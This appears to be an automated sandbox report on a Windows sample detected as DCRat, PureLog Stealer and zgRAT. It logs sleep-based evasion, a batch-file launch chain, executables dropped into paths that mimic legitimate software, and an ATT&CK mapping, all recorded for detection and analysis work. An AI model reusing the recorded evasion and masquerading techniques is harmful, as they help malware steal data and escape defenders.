                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598188s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -598078s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597969s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597859s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597750s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597641s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597531s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597422s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597312s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597203s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -597094s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596984s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596875s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596766s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596656s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596547s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596438s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596313s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596188s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -596063s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595953s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595843s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595734s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595625s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595504s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595375s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595266s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595141s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -595031s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -594922s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -594812s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -594703s >= -30000sJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe TID: 6496Thread sleep time: -594594s >= -30000sJump to behavior
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 30000Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 922337203685477Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 600000Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599859Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599750Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599641Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599516Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599406Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599297Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599187Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 599078Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 3600000Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598968Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598859Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598750Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598641Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598525Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598406Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598297Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598188Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 598078Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597969Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597859Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597750Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597641Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597531Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597422Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597312Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597203Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 597094Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596984Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596875Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596766Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596656Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596547Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596438Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596313Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596188Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 596063Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595953Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595843Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595734Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595625Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595504Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595375Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595266Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595141Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 595031Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594922Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594812Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594703Jump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeThread delayed: delay time: 594594Jump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: w32tm.exe, 00000005.00000002.2056764410.0000017A94402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2007578949.000000001B9B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: E#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4443109616.000000001B518000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeProcess token adjusted: DebugJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeMemory allocated: page read and write | page guardJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZdeZCxRlxT.bat" Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe "C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe" Jump to behavior
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002F75000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerp
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeQueries volume information: C:\Users\user\Desktop\4Osfx7gnSx.exe VolumeInformationJump to behavior
                              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exeQueries volume information: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Stealing of Sensitive Information

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2005023300.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 4Osfx7gnSx.exe PID: 3524, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: izvoheVaDbpPfPMLrEwQFH.exe PID: 2892, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 4Osfx7gnSx.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4Osfx7gnSx.exe.b20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1985120867.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Idle.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 4Osfx7gnSx.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4Osfx7gnSx.exe.b20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Idle.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.2005023300.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 4Osfx7gnSx.exe PID: 3524, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: izvoheVaDbpPfPMLrEwQFH.exe PID: 2892, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 4Osfx7gnSx.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4Osfx7gnSx.exe.b20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1985120867.0000000000B22000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Idle.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 4Osfx7gnSx.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.4Osfx7gnSx.exe.b20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\dllhost.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files\Mozilla Firefox\fonts\RuntimeBroker.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft.NET\Idle.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid AccountsWindows Management Instrumentation1
                              Scripting                              		12
                              Process Injection                              		13
                              Masquerading                              		OS Credential Dumping21
                              Security Software Discovery                              		Remote Services11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault AccountsScheduled Task/Job1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		1
                              Disable or Modify Tools                              		LSASS Memory2
                              Process Discovery                              		Remote Desktop ProtocolData from Removable Media1
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)131
                              Virtualization/Sandbox Evasion                              		Security Account Manager131
                              Virtualization/Sandbox Evasion                              		SMB/Windows Admin SharesData from Network Shared Drive11
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Process Injection                              		NTDS1
                              Application Window Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Deobfuscate/Decode Files or Information                              		LSA Secrets2
                              File and Directory Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                              Obfuscated Files or Information                              		Cached Domain Credentials113
                              System Information Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                              Software Packing                              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading                              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.